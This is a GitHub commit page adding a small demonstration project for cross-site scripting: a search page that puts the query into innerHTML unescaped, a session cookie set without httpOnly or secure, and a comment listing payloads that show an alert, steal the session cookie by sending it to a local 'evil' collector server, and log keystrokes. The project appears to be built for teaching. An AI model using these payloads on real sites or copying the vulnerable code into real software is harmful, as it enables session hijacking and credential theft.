Skip to content

Commit

Permalink
Initial commit
Browse files Browse the repository at this point in the history
  • Loading branch information
@chill117
chill117 committed Oct 19, 2016
0 parents commit 66e3a24
Show file tree
Hide file tree
Showing 5 changed files with 142 additions and 0 deletions.
2 changes: 2 additions & 0 deletions .gitignore
Original file line number Diff line number Diff line change
@@ -0,0 +1,2 @@
node_modules/

14 changes: 14 additions & 0 deletions evil-server.js
Original file line number Diff line number Diff line change
@@ -0,0 +1,14 @@
var express = require('express');
var app = express();

app.get('/cookie', function(req, res, next) {

console.log('GET /cookie');
console.log(req.query.cookie);

res.send('Thanks!');
});

app.listen(3001, function() {
console.log('"Evil" server listening at localhost:3001');
});
17 changes: 17 additions & 0 deletions package.json
Original file line number Diff line number Diff line change
@@ -0,0 +1,17 @@
{
"name": "xss",
"version": "1.0.0",
"description": "",
"main": "index.js",
"dependencies": {
"express": "4.14.0",
"express-session": "1.14.1",
"serve-static": "1.11.1"
},
"devDependencies": {},
"scripts": {
"test": "echo \"Error: no test specified\" && exit 1"
},
"author": "",
"license": "ISC"
}
89 changes: 89 additions & 0 deletions public/index.html
Original file line number Diff line number Diff line change
@@ -0,0 +1,89 @@
<html>
<head>
<title>Cross-Site Scripting (XSS)</title>
</head>
<body>

<form action="">
<input type="text" name="q">
<input type="submit" value="Search">
</form>

<div id="results"></div>

<script>

/*
Proof of concept:
<img src="does-not-exist" onerror="alert(\'hi\')">
Alert session cookie:
<img src="does-not-exist" onerror="alert(document.cookie)">
Steal session cookie:
<img src="does-not-exist" onerror="var img = document.createElement(\'img\'); img.src = \'http://localhost:3001/cookie?cookie=\' + document.cookie; document.querySelector(\'body\').appendChild(img);">
Keylogger:
<img src="does-not-exist" onerror="document.querySelector(\'body\').addEventListener(\'keydown\', function(event) { console.log(event.key); });">
*/

document.addEventListener('DOMContentLoaded', function() {

var q = getQueryParameter('q');

if (q) {

search(q, function(error, results) {

showQueryAndResults(q, results);
});
}
});

function search(q, callback) {

var results = [
'Result #1',
'Result #2',
'Result #3'
];

callback(null, results);
}

function showQueryAndResults(q, results) {

var html = '';

html += '<p>Your search query:</p>';
html += '<pre>' + q + '</pre>';
html += '<ul>';

for (var i = 0; i < results.length; i++) {
html += '<li>' + results[i] + '</li>';
}

html += '</ul>';

var resultsEl = document.querySelector('#results');
resultsEl.innerHTML = html;
}

function getQueryParameter(name) {

var pairs = window.location.search.substring(1).split('&');

for (var i = 0; i < pairs.length; i++) {

var pair = pairs[i].split('=');

if (decodeURIComponent(pair[0]) === name) {
return decodeURIComponent(pair[1]);
}
}

return false;
}
</script>
</body>
</html>
20 changes: 20 additions & 0 deletions server.js
Original file line number Diff line number Diff line change
@@ -0,0 +1,20 @@
var express = require('express');
var session = require('express-session');
var serverStatic = require('serve-static');
var app = express();

app.use(serverStatic(__dirname + '/public'));

app.use(session({
secret: 'some randomly generated secret',
resave: true,
saveUninitialized: true,
cookie: {
httpOnly: false,
secure: false
}
}));

app.listen(3000, function() {
console.log('Server listening at localhost:3000');
});

0 comments on commit 66e3a24

Please sign in to comment.